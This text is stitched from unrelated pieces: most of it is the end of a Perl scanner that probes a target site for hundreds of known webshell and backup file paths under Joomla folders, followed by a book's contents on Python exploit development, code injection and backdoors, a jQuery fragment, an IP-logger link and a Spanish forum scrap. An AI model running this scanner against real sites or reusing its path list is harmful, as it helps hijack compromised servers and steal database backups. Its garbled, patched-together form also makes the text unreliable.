"/templates/beez/xd.php",
"/templates/beez/c100.php",
"/templates/beez/spy.aspx",
"/templates/beez/xd.php",
"/templates/beez/tmp/xd.php",
"/templates/beez/sym/root/home/",
"/templates/beez/billing/killer.php",
"/templates/beez/tmp/upload.php",
"/templates/beez/tmp/admin.php",
"/templates/beez/Server.php",
"/templates/beez/tmp/uploads.php",
"/templates/beez/tmp/up.php",
"/templates/beez/Server/",
"/templates/beez/wp-admin/c99.php",
"/templates/beez/tmp/priv8.php",
"/templates/beez/priv8.php",
"/templates/beez/cgi.pl/",
"/templates/beez/tmp/cgi.pl",
"/templates/beez/downloads/dom.php",
"/templates/beez/webadmin.html",
"/templates/beez/admins.php",
"/templates/beez/bluff.php",
"/templates/beez/king.jeen",
"/templates/beez/admins/",
"/templates/beez/admins.asp",
"/templates/beez/admins.php",
"/templates/beez/wp.zip",
"/templates/beez/index.php","/images/WSO.php",
"/images/dz.php",
"/images/DZ.php",
"/images/cpanel.php",
"/images/cpn.php",
"/images/sos.php",
"/images/term.php",
"/images/Sec-War.php",
"/images/sql.php",
"/images/ssl.php",
"/images/mysql.php",
"/images/WolF.php",
"/images/madspot.php",
"/images/Cgishell.pl",
"/images/killer.php",
"/images/changeall.php",
"/images/2.php",
"/images/Sh3ll.php",
"/images/dz0.php",
"/images/dam.php",
"/images/user.php",
"/images/dom.php",
"/images/whmcs.php",
"/images/vb.zip",
"/images/r00t.php",
"/images/c99.php",
"/images/gaza.php",
"/images/1.php",
"/images/d0mains.php",
"/images/madspotshell.php",
"/images/info.php",
"/images/egyshell.php",
"/images/Sym.php",
"/images/c22.php",
"/images/c100.php",
"/images/configuration.php",
"/images/g.php",
"/images/xx.pl",
"/images/ls.php",
"/images/Cpanel.php",
"/images/k.php",
"/images/zone-h.php",
"/images/tmp/user.php",
"/images/tmp/Sym.php",
"/images/cp.php",
"/images/tmp/madspotshell.php",
"/images/tmp/root.php",
"/images/tmp/whmcs.php",
"/images/tmp/index.php",
"/images/tmp/2.php",
"/images/tmp/dz.php",
"/images/tmp/cpn.php",
"/images/tmp/changeall.php",
"/images/tmp/Cgishell.pl",
"/images/tmp/sql.php",
"/images/0day.php",
"/images/tmp/admin.php",
"/images/L3b.php",
"/images/d.php",
"/images/tmp/d.php",
"/images/tmp/L3b.php",
"/images/sado.php",
"/images/admin1.php",
"/images/upload.php",
"/images/up.php",
"/images/vb.zip",
"/images/vb.rar",
"/images/admin2.asp",
"/images/uploads.php",
"/images/sa.php",
"/images/sysadmins/",
"/images/admin1/",
"/images/sniper.php",
"/images/images/Sym.php",
"/images//r57.php",
"/images/gzaa_spysl",
"/images/sql-new.php",
"/images//shell.php",
"/images//sa.php",
"/images//admin.php",
"/images//sa2.php",
"/images//2.php",
"/images//gaza.php",
"/images//up.php",
"/images//upload.php",
"/images//uploads.php",
"/images/shell.php",
"/images//amad.php",
"/images//t00.php",
"/images//dz.php",
"/images//site.rar",
"/images//Black.php",
"/images//site.tar.gz",
"/images//home.zip",
"/images//home.rar",
"/images//home.tar",
"/images//home.tar.gz",
"/images//forum.zip",
"/images//forum.rar",
"/images//forum.tar",
"/images//forum.tar.gz",
"/images//test.txt",
"/images//ftp.txt",
"/images//user.txt",
"/images//site.txt",
"/images//error_log",
"/images//error",
"/images//cpanel",
"/images//awstats",
"/images//site.sql",
"/images//vb.sql",
"/images//forum.sql",
"/images/r00t-s3c.php",
"/images/c.php",
"/images//backup.sql",
"/images//back.sql",
"/images//data.sql",
"/images/wp.rar/",
"/images/asp.aspx",
"/images/tmp/vaga.php",
"/images/tmp/killer.php",
"/images/whmcs.php",
"/images/abuhlail.php",
"/images/tmp/killer.php",
"/images/tmp/domaine.pl",
"/images/tmp/domaine.php",
"/images/useradmin/",
"/images/tmp/d0maine.php",
"/images/d0maine.php",
"/images/tmp/sql.php",
"/images/X.php",
"/images/123.php",
"/images/m.php",
"/images/b.php",
"/images/up.php",
"/images/tmp/dz1.php",
"/images/dz1.php",
"/images/forum.zip",
"/images/Symlink.php",
"/images/Symlink.pl",
"/images/forum.rar",
"/images/joomla.zip",
"/images/joomla.rar",
"/images/wp.php",
"/images/buck.sql",
"/includes/WSO.php",
"/includes/dz.php",
"/includes/DZ.php",
"/includes/cpanel.php",
"/includes/cpn.php",
"/includes/sos.php",
"/includes/term.php",
"/includes/Sec-War.php",
"/includes/sql.php",
"/includes/ssl.php",
"/includes/mysql.php",
"/includes/WolF.php",
"/includes/madspot.php",
"/includes/Cgishell.pl",
"/includes/killer.php",
"/includes/changeall.php",
"/includes/2.php",
"/includes/Sh3ll.php",
"/includes/dz0.php",
"/includes/dam.php",
"/includes/user.php",
"/includes/dom.php",
"/includes/whmcs.php",
"/includes/vb.zip",
"/includes/r00t.php",
"/includes/c99.php",
"/includes/gaza.php",
"/includes/1.php",
"/includes/d0mains.php",
"/includes/madspotshell.php",
"/includes/info.php",
"/includes/egyshell.php",
"/includes/Sym.php",
"/includes/c22.php",
"/includes/c100.php",
"/includes/configuration.php",
"/includes/g.php",
"/includes/xx.pl",
"/includes/ls.php",
"/includes/Cpanel.php",
"/includes/k.php",
"/includes/zone-h.php",
"/includes/tmp/user.php",
"/includes/tmp/Sym.php",
"/includes/cp.php",
"/includes/tmp/madspotshell.php",
"/includes/tmp/root.php",
"/includes/tmp/whmcs.php",
"/includes/tmp/index.php",
"/includes/tmp/2.php",
"/includes/tmp/dz.php",
"/includes/tmp/cpn.php",
"/includes/tmp/changeall.php",
"/includes/tmp/Cgishell.pl",
"/includes/tmp/sql.php",
"/includes/0day.php",
"/includes/tmp/admin.php",
"/includes/L3b.php",
"/includes/d.php",
"/includes/tmp/d.php",
"/includes/tmp/L3b.php",
"/includes/sado.php",
"/includes/admin1.php",
"/includes/upload.php",
"/includes/up.php",
"/includes/vb.zip",
"/includes/vb.rar",
"/includes/admin2.asp",
"/includes/uploads.php",
"/includes/sa.php",
"/includes/sysadmins/",
"/includes/admin1/",
"/includes/sniper.php",
"/includes/images/Sym.php",
"/includes//r57.php",
"/includes/gzaa_spysl",
"/includes/sql-new.php",
"/includes//shell.php",
"/includes//sa.php",
"/includes//admin.php",
"/includes//sa2.php",
"/includes//2.php",
"/includes//gaza.php",
"/includes//up.php",
"/includes//upload.php",
"/includes//uploads.php",
"/includes/shell.php",
"/includes//amad.php",
"/includes//t00.php",
"/includes//dz.php",
"/includes//site.rar",
"/includes//Black.php",
"/includes//site.tar.gz",
"/includes//home.zip",
"/includes//home.rar",
"/includes//home.tar",
"/includes//home.tar.gz",
"/includes//forum.zip",
"/includes//forum.rar",
"/includes//forum.tar",
"/includes//forum.tar.gz",
"/includes//test.txt",
"/includes//ftp.txt",
"/includes//user.txt",
"/includes//site.txt",
"/includes//error_log",
"/includes//error",
"/includes//cpanel",
"/includes//awstats",
"/includes//site.sql",
"/includes//vb.sql",
"/includes//forum.sql",
"/includes/r00t-s3c.php",
"/includes/c.php",
"/includes//backup.sql",
"/includes//back.sql",
"/includes//data.sql",
"/includes/wp.rar/",
"/includes/asp.aspx",
"/includes/tmp/vaga.php",
"/includes/tmp/killer.php",
"/includes/whmcs.php",
"/includes/abuhlail.php",
"/includes/tmp/killer.php",
"/includes/tmp/domaine.pl",
"/includes/tmp/domaine.php",
"/includes/useradmin/",
"/includes/tmp/d0maine.php",
"/includes/d0maine.php",
"/includes/tmp/sql.php",
"/includes/X.php",
"/includes/123.php",
"/includes/m.php",
"/includes/b.php",
"/includes/up.php",
"/includes/tmp/dz1.php",
"/includes/dz1.php",
"/includes/forum.zip",
"/includes/Symlink.php",
"/includes/Symlink.pl",
"/includes/forum.rar",
"/includes/joomla.zip",
"/includes/joomla.rar",
"/includes/wp.php",
"/includes/buck.sql",
"/includes/sysadmin.php",
"/includes/images/c99.php",
"/includes/xd.php",
"/includes/c100.php",
"/includes/spy.aspx",
"/includes/xd.php",
"/includes/tmp/xd.php",
"/includes/sym/root/home/",
"/includes/billing/killer.php",
"/includes/tmp/upload.php",
"/includes/tmp/admin.php",
"/includes/Server.php",
"/includes/tmp/uploads.php",
"/includes/tmp/up.php",
"/includes/Server/",
"/includes/wp-admin/c99.php",
"/includes/tmp/priv8.php",
"/includes/priv8.php",
"/includes/cgi.pl/",
"/includes/tmp/cgi.pl",
"/includes/downloads/dom.php",
"/includes/webadmin.html",
"/includes/admins.php",
"/includes/bluff.php",
"/includes/king.jeen",
"/includes/admins/",
"/includes/admins.asp",
"/includes/admins.php",
"/includes/wp.zip",
"/includes/",
"/templates/rhuk_milkyway/WSO.php",
"/templates/rhuk_milkyway/dz.php",
"/templates/rhuk_milkyway/DZ.php",
"/templates/rhuk_milkyway/cpanel.php",
"/templates/rhuk_milkyway/cpn.php",
"/templates/rhuk_milkyway/sos.php",
"/templates/rhuk_milkyway/term.php",
"/templates/rhuk_milkyway/Sec-War.php",
"/templates/rhuk_milkyway/sql.php",
"/templates/rhuk_milkyway/ssl.php",
"/templates/rhuk_milkyway/mysql.php",
"/templates/rhuk_milkyway/WolF.php",
"/templates/rhuk_milkyway/madspot.php",
"/templates/rhuk_milkyway/Cgishell.pl",
"/templates/rhuk_milkyway/killer.php",
"/templates/rhuk_milkyway/changeall.php",
"/templates/rhuk_milkyway/2.php",
"/templates/rhuk_milkyway/Sh3ll.php",
"/templates/rhuk_milkyway/dz0.php",
"/templates/rhuk_milkyway/dam.php",
"/templates/rhuk_milkyway/user.php",
"/templates/rhuk_milkyway/dom.php",
"/templates/rhuk_milkyway/whmcs.php",
"/templates/rhuk_milkyway/vb.zip",
"/templates/rhuk_milkyway/r00t.php",
"/templates/rhuk_milkyway/c99.php",
"/templates/rhuk_milkyway/gaza.php",
"/templates/rhuk_milkyway/1.php",
"/templates/rhuk_milkyway/d0mains.php",
"/templates/rhuk_milkyway/madspotshell.php",
"/templates/rhuk_milkyway/info.php",
"/templates/rhuk_milkyway/egyshell.php",
"/templates/rhuk_milkyway/Sym.php",
"/templates/rhuk_milkyway/c22.php",
"/templates/rhuk_milkyway/c100.php",
"/templates/rhuk_milkyway/configuration.php",
"/templates/rhuk_milkyway/g.php",
"/templates/rhuk_milkyway/xx.pl",
"/templates/rhuk_milkyway/ls.php",
"/templates/rhuk_milkyway/Cpanel.php",
"/templates/rhuk_milkyway/k.php",
"/templates/rhuk_milkyway/zone-h.php",
"/templates/rhuk_milkyway/tmp/user.php",
"/templates/rhuk_milkyway/tmp/Sym.php",
"/templates/rhuk_milkyway/cp.php",
"/templates/rhuk_milkyway/tmp/madspotshell.php",
"/templates/rhuk_milkyway/tmp/root.php",
"/templates/rhuk_milkyway/tmp/whmcs.php",
"/templates/rhuk_milkyway/tmp/index.php",
"/templates/rhuk_milkyway/tmp/2.php",
"/templates/rhuk_milkyway/tmp/dz.php",
"/templates/rhuk_milkyway/tmp/cpn.php",
"/templates/rhuk_milkyway/tmp/changeall.php",
"/templates/rhuk_milkyway/tmp/Cgishell.pl",
"/templates/rhuk_milkyway/tmp/sql.php",
"/templates/rhuk_milkyway/0day.php",
"/templates/rhuk_milkyway/tmp/admin.php",
"/templates/rhuk_milkyway/L3b.php",
"/templates/rhuk_milkyway/d.php",
"/templates/rhuk_milkyway/tmp/d.php",
"/templates/rhuk_milkyway/tmp/L3b.php",
"/templates/rhuk_milkyway/sado.php",
"/templates/rhuk_milkyway/admin1.php",
"/templates/rhuk_milkyway/upload.php",
"/templates/rhuk_milkyway/up.php",
"/templates/rhuk_milkyway/vb.zip",
"/templates/rhuk_milkyway/vb.rar",
"/templates/rhuk_milkyway/admin2.asp",
"/templates/rhuk_milkyway/uploads.php",
"/templates/rhuk_milkyway/sa.php",
"/templates/rhuk_milkyway/sysadmins/",
"/templates/rhuk_milkyway/admin1/",
"/templates/rhuk_milkyway/sniper.php",
"/templates/rhuk_milkyway/images/Sym.php",
"/templates/rhuk_milkyway//r57.php",
"/templates/rhuk_milkyway/gzaa_spysl",
"/templates/rhuk_milkyway/sql-new.php",
"/templates/rhuk_milkyway//shell.php",
"/templates/rhuk_milkyway//sa.php",
"/templates/rhuk_milkyway//admin.php",
"/templates/rhuk_milkyway//sa2.php",
"/templates/rhuk_milkyway//2.php",
"/templates/rhuk_milkyway//gaza.php",
"/templates/rhuk_milkyway//up.php",
"/templates/rhuk_milkyway//upload.php",
"/templates/rhuk_milkyway//uploads.php",
"/templates/rhuk_milkyway/shell.php",
"/templates/rhuk_milkyway//amad.php",
"/templates/rhuk_milkyway//t00.php",
"/templates/rhuk_milkyway//dz.php",
"/templates/rhuk_milkyway//site.rar",
"/templates/rhuk_milkyway//Black.php",
"/templates/rhuk_milkyway//site.tar.gz",
"/templates/rhuk_milkyway//home.zip",
"/templates/rhuk_milkyway//home.rar",
"/templates/rhuk_milkyway//home.tar",
"/templates/rhuk_milkyway//home.tar.gz",
"/templates/rhuk_milkyway//forum.zip",
"/templates/rhuk_milkyway//forum.rar",
"/templates/rhuk_milkyway//forum.tar",
"/templates/rhuk_milkyway//forum.tar.gz",
"/templates/rhuk_milkyway//test.txt",
"/templates/rhuk_milkyway//ftp.txt",
"/templates/rhuk_milkyway//user.txt",
"/templates/rhuk_milkyway//site.txt",
"/templates/rhuk_milkyway//error_log",
"/templates/rhuk_milkyway//error",
"/templates/rhuk_milkyway//cpanel",
"/templates/rhuk_milkyway//awstats",
"/templates/rhuk_milkyway//site.sql",
"/templates/rhuk_milkyway//vb.sql",
"/templates/rhuk_milkyway//forum.sql",
"/templates/rhuk_milkyway/r00t-s3c.php",
"/templates/rhuk_milkyway/c.php",
"/templates/rhuk_milkyway//backup.sql",
"/templates/rhuk_milkyway//back.sql",
"/templates/rhuk_milkyway//data.sql",
"/templates/rhuk_milkyway/wp.rar/",
"/templates/rhuk_milkyway/asp.aspx",
"/templates/rhuk_milkyway/tmp/vaga.php",
"/templates/rhuk_milkyway/tmp/killer.php",
"/templates/rhuk_milkyway/whmcs.php",
"/templates/rhuk_milkyway/abuhlail.php",
"/templates/rhuk_milkyway/tmp/killer.php",
"/templates/rhuk_milkyway/tmp/domaine.pl",
"/templates/rhuk_milkyway/tmp/domaine.php",
"/templates/rhuk_milkyway/useradmin/",
"/templates/rhuk_milkyway/tmp/d0maine.php",
"/templates/rhuk_milkyway/d0maine.php",
"/templates/rhuk_milkyway/tmp/sql.php",
"/templates/rhuk_milkyway/X.php",
"/templates/rhuk_milkyway/123.php",
"/templates/rhuk_milkyway/m.php",
"/templates/rhuk_milkyway/b.php",
"/templates/rhuk_milkyway/up.php",
"/templates/rhuk_milkyway/tmp/dz1.php",
"/templates/rhuk_milkyway/dz1.php",
"/templates/rhuk_milkyway/forum.zip",
"/templates/rhuk_milkyway/Symlink.php",
"/templates/rhuk_milkyway/Symlink.pl",
"/templates/rhuk_milkyway/forum.rar",
"/templates/rhuk_milkyway/joomla.zip",
"/templates/rhuk_milkyway/joomla.rar",
"/templates/rhuk_milkyway/wp.php",
"/templates/rhuk_milkyway/buck.sql",
"/templates/rhuk_milkyway/sysadmin.php",
"/templates/rhuk_milkyway/images/c99.php",
"/templates/rhuk_milkyway/xd.php",
"/templates/rhuk_milkyway/c100.php",
"/templates/rhuk_milkyway/spy.aspx",
"/templates/rhuk_milkyway/xd.php",
"/templates/rhuk_milkyway/tmp/xd.php",
"/templates/rhuk_milkyway/sym/root/home/",
"/templates/rhuk_milkyway/billing/killer.php",
"/templates/rhuk_milkyway/tmp/upload.php",
"/templates/rhuk_milkyway/tmp/admin.php",
"/templates/rhuk_milkyway/Server.php",
"/templates/rhuk_milkyway/tmp/uploads.php",
"/templates/rhuk_milkyway/tmp/up.php",
"/templates/rhuk_milkyway/Server/",
"/templates/rhuk_milkyway/wp-admin/c99.php",
"/templates/rhuk_milkyway/tmp/priv8.php",
"/templates/rhuk_milkyway/priv8.php",
"/templates/rhuk_milkyway/cgi.pl/",
"/templates/rhuk_milkyway/tmp/cgi.pl",
"/templates/rhuk_milkyway/downloads/dom.php",
"/templates/rhuk_milkyway/webadmin.html",
"/templates/rhuk_milkyway/admins.php",
"/templates/rhuk_milkyway/bluff.php",
"/templates/rhuk_milkyway/king.jeen",
"/templates/rhuk_milkyway/admins/",
"/templates/rhuk_milkyway/admins.asp",
"/templates/rhuk_milkyway/admins.php",
"/templates/rhuk_milkyway/wp.zip",
"/templates/rhuk_milkyway/","WSO.php",
"a.php",
"z.php",
"e.php",
"r.php",
"t.php",
"y.php",
"u.php",
"i.php",
"o.php",
"p.php",
"q.php",
"s.php",
"d.php",
"f.php",
"g.php",
"h.php",
"j.php",
"k.php",
"l.php",
"m.php",
"w.php",
"x.php",
"c.php",
"v.php",
"b.php",
"n.php",
"1.php",
"2.php",
"3.php",
"4.php",
"5.php",
"6.php",
"7.php",
"8.php",
"9.php",
"10.php",
"12.php",
"11.php",
"1234.php","hacker.php","hacked.php","sea.php");
foreach $shell @shell) {
$link = $h0st.$shell;
$request = HTTP::Request->new(GET=>$link);
$useragent = LWP::UserAgent->new();
$response = $useragent->request($request);
if($response->is_success){print color("bold green"),"\n\t [SMTH] Something found: $link\n\n";print color 'reset';
}
if($response->content=~ /Access Denied/){
print "\tSomething found: $link [Access Denied]\n\n";
}else{
print color("bold red"),"[NTHG] Nothing found : $link\n"; print color 'reset';
}
}
1
SETTING UP YOUR DEVELOPMENT ENVIRONMENT 1
1.1 Operating System Requirements ......................................................................... 2
1.2 Obtaining and Installing Python 2.5 ................................................................... 2
1.2.1 Installing Python on Windows ............................................................ 2
1.2.2 Installing Python for Linux .................................................................. 3
1.3 Setting Up Eclipse and PyDev ............................................................................ 4
1.3.1 The Hacker's Best Friend: ctypes ........................................................ 5
1.3.2 Using Dynamic Libraries ................................................................... 6
1.3.3 Constructing C Datatypes .................................................................. 8
1.3.4 Passing Parameters by Reference ....................................................... 9
1.3.5 Defining Structures and Unions .......................................................... 9
2
DEBUGGERS AND DEBUGGER DESIGN 13
2.1 General-Purpose CPU Registers......................................................................... 14
2.2 The Stack... 16
2.3 Debug Events ................................................................................................. 18
2.4 Breakpoints ... 18
2.4.1 Soft Breakpoints.............................................................................. 19
2.4.2 Hardware Breakpoints..................................................................... 21
2.4.3 Memory Breakpoints ....................................................................... 23
3
BU ILD ING A W INDOWS DEBUGGER 25
3.1 Debuggee, Where Art Thou?............................................................................ 25
3.2 Obtaining CPU Register State........................................................................... 33
3.2.1 Thread Enumeration ........................................................................ 33
3.2.2 Putting It All Together....................................................................... 35
3.3 Implementing Debug Event Handlers ................................................................. 39
3.4 The Almighty Breakpoint .................................................................................. 43
3.4.1 Soft Breakpoints.............................................................................. 43
3.4.2 Hardware Breakpoints..................................................................... 47
3.4.3 Memory Breakpoints ....................................................................... 52
3.5 Conclusion... 55
x Contents in Detail
4
PYDBG—A PURE PYTHON W INDOWS DEBUGGER 57
4.1 Extending Breakpoint Handlers......................................................................... 58
4.2 Access Violation Handlers................................................................................ 60
4.3 Process Snapshots........................................................................................... 63
4.3.1 Obtaining Process Snapshots ........................................................... 63
4.3.2 Putting It All Together....................................................................... 65
5
IMMUN ITY DEBUGGER—THE BEST O F BOTH WORLDS 69
5.1 Installing Immunity Debugger............................................................................ 70
5.2 Immunity Debugger 101 .................................................................................. 70
5.2.1 PyCommands ................................................................................. 71
5.2.2 PyHooks ........................................................................................ 71
5.3 Exploit Development........................................................................................ 73
5.3.1 Finding Exploit-Friendly Instructions ................................................... 73
5.3.2 Bad-Character Filtering .................................................................... 75
5.3.3 Bypassing DEP on Windows ............................................................ 77
5.4 Defeating Anti-Debugging Routines in Malware .................................................. 81
5.4.1 IsDebuggerPresent .......................................................................... 81
5.4.2 Defeating Process Iteration ............................................................... 82
6
HOOKING 85
6.1 Soft Hooking with PyDbg ................................................................................. 86
6.2 Hard Hooking with Immunity Debugger ............................................................. 90
7
DLL AND CODE INJECT ION 97
7.1 Remote Thread Creation .................................................................................. 98
7.1.1 DLL Injection ................................................................................... 99
7.1.2 Code Injection.............................................................................. 101
7.2 Getting Evil .................................................................................................. 104
7.2.1 File Hiding ................................................................................... 104
7.2.2 Coding the Backdoor .................................................................... 105
7.2.3 Compiling with py2exe.................................................................. 108
8
FUZZING 111
8.1 Bug Classes ................................................................................................. 112
8.1.1 Buffer Overflows ........................................................................... 112
8.1.2 Integer Overflows ......................................................................... 113
8.1.3 Format String Attacks..................................................................... 114
8.2 File Fuzzer ................................................................................................... 115
8.3 Future Considerations.................................................................................... 122
8.3.1 Code Coverage............................................................................ 122
8.3.2 Automated Static Analysis.............................................................. 122
Contents in Detail xi
9
SULLEY 123
9.1 Sulley Installation .......................................................................................... 124
9.2 Sulley Primitives ............................................................................................ 125
9.2.1 Strings ......................................................................................... 125
9.2.2 Delimiters..................................................................................... 125
9.2.3 Static and Random Primitives.......................................................... 126
9.2.4 Binary Data.................................................................................. 126
9.2.5 Integers ....................................................................................... 126
9.2.6 Blocks and Groups........................................................................ 127
9.3 Slaying WarFTPD with Sulley ......................................................................... 129
9.3.1 FTP 101....................................................................................... 129
9.3.2 Creating the FTP Protocol Skeleton .................................................. 130
9.3.3 Sulley Sessions ............................................................................. 131
9.3.4 Network and Process Monitoring .................................................... 132
9.3.5 Fuzzing and the Sulley Web Interface ............................................. 133
10
FUZZING WINDOWS DRIVERS 137
10.1 Driver Communication ................................................................................. 138
10.2 Driver Fuzzing with Immunity Debugger......................................................... 139
10.3 Driverlib—The Static Analysis Tool for Drivers................................................. 142
10.3.1 Discovering Device Names .......................................................... 143
10.3.2 Finding the IOCTL Dispatch Routine............................................... 144
10.3.3 Determining Supported IOCTL Codes ............................................ 145
10.4 Building a Driver Fuzzer .............................................................................. 147
11
IDAPYTHON—SCRIPTING IDA PRO 153
11.1 IDAPython Installation.................................................................................. 154
11.2 IDAPython Functions.................................................................................... 155
11.2.1 Utility Functions........................................................................... 155
11.2.2 Segments ................................................................................... 155
11.2.3 Functions ................................................................................... 156
11.2.4 Cross-References......................................................................... 156
11.2.5 Debugger Hooks......................................................................... 157
11.3 Example Scripts .......................................................................................... 158
11.3.1 Finding Dangerous Function Cross-References................................. 158
11.3.2 Function Code Coverage ............................................................. 160
11.3.3 Calculating Stack Size................................................................. 161
12
PYEMU—THE SCRIPTABLE EMULATOR 163
12.1 Installing PyEmu.......................................................................................... 164
12.2 PyEmu Overview......................................................................................... 164
12.2.1 PyCPU....................................................................................... 164
12.2.2 PyMemory.................................................................................. 165
12.2.3 PyEmu ....................................................................................... 165
xii Contents in Detail
12.2.4 Execution................................................................................... 165
12.2.5 Memory and Register Modifiers .................................................... 165
12.2.6 Handlers.................................................................................... 166
12.3 IDAPyEmu .................................................................................................. 171
12.3.1 Function Emulation ...................................................................... 172
12.3.2 PEPyEmu.................................................................................... 175
12.3.3 Executable Packers...................................................................... 176
12.3.4 UPX Packer ................................................................................ 176
12.3.5 Unpacking UPX with PEPyEmu ...................................................... 177
https://jumpshare.com/v/xFLx3MTm0AISnUawymbOvar array = new Array();
$('[id^=estudiante_]').each(function () {
var objProducto = new Object();
objProducto.idestudiante = $(this).attr('id');
objProducto.txtidantf = $("#txtnombreestudiante_" + objProducto.idestudiante).val();
array.push(objProducto);
});https://iplogger.org/No tienes permitido ver enlaces. Registrate o Entra a tu cuenta
Aprovechando la circunstancia probaré Parrot OS, para ver que tal.
Gracias.
